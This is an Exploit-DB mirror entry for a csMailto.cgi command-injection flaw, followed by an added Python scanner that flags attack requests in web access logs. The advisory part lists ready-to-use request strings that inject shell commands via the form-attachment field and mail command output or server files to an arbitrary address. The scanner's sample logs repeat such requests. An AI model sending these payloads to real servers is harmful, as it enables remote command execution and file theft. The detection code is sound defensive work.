exploit-db-mirror/exploits/cgi/remote/21415.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

source: https://www.securityfocus.com/bid/4579/info
CGIScript.NET csMailto is a Perl script designed to support multiple mailto: forms. A vulnerability has been reported in some versions of this script.
Reportedly, configuration values used by the script are contained in hidden form values. As a result, a remote attacker may trivially modify these values between script invocations. Consequences include arbitrary command execution on the vulnerable system.
- execute commands on server
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform
- execute command on server and mail output to anyone
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&Email=user@host.com&form-autoresponse=YES&command=mailform
- email server file to anyone
CSMailto.cgi?form-attachment=FILEPATH_HERE&Email=user@host.com&form-autoresponse=YES&command=mailform
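
A defender-side check for the request patterns listed above, as an added example that is not part of the original advisory: it scans web server access logs for csMailto requests whose form-attachment value carries a pipe character or a server file path. The log lines are constructed samples, and the combined log format and the function names are assumptions; values sent in POST bodies do not appear in access logs, so only query-string requests are covered.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); all values are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [03/May/2002:10:01:11 +0000] "GET /cgi-bin/CSMailto.cgi?command=mailform&Email=a%40example.com HTTP/1.0" 200 512
192.0.2.77 - - [03/May/2002:10:02:40 +0000] "GET /cgi-bin/CSMailto.cgi?form-attachment=uptime%7C&command=mailform HTTP/1.0" 200 128
192.0.2.77 - - [03/May/2002:10:03:02 +0000] "GET /cgi-bin/CSMailto.cgi?form-attachment=/etc/hosts&Email=x%40example.net&form-autoresponse=YES&command=mailform HTTP/1.0" 200 90
192.0.2.5 - - [03/May/2002:10:04:00 +0000] "GET /index.html HTTP/1.0" 200 1024
"""

# Request line inside the quoted field of an access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Script name as it appears in the advisory, matched case-insensitively.
SCRIPT_RE = re.compile(r"/csmailto\.cgi$", re.IGNORECASE)


def classify(target):
    """Return a finding label for a request target, or None if nothing matches."""
    parts = urlsplit(target)
    if not SCRIPT_RE.search(parts.path):
        return None
    # parse_qs percent-decodes values, so %7C is seen as '|'.
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("form-attachment", []):
        if "|" in value:
            return "pipe in form-attachment"
        if value.startswith("/") or ".." in value:
            return "server path in form-attachment"
    return None


def scan(log_text):
    """Return (client_ip, finding) tuples for every suspicious log line."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reason = classify(match.group(1))
        if reason:
            findings.append((line.split()[0], reason))
    return findings


if __name__ == "__main__":
    for client, reason in scan(SAMPLE_LOG):
        print(client, reason)
```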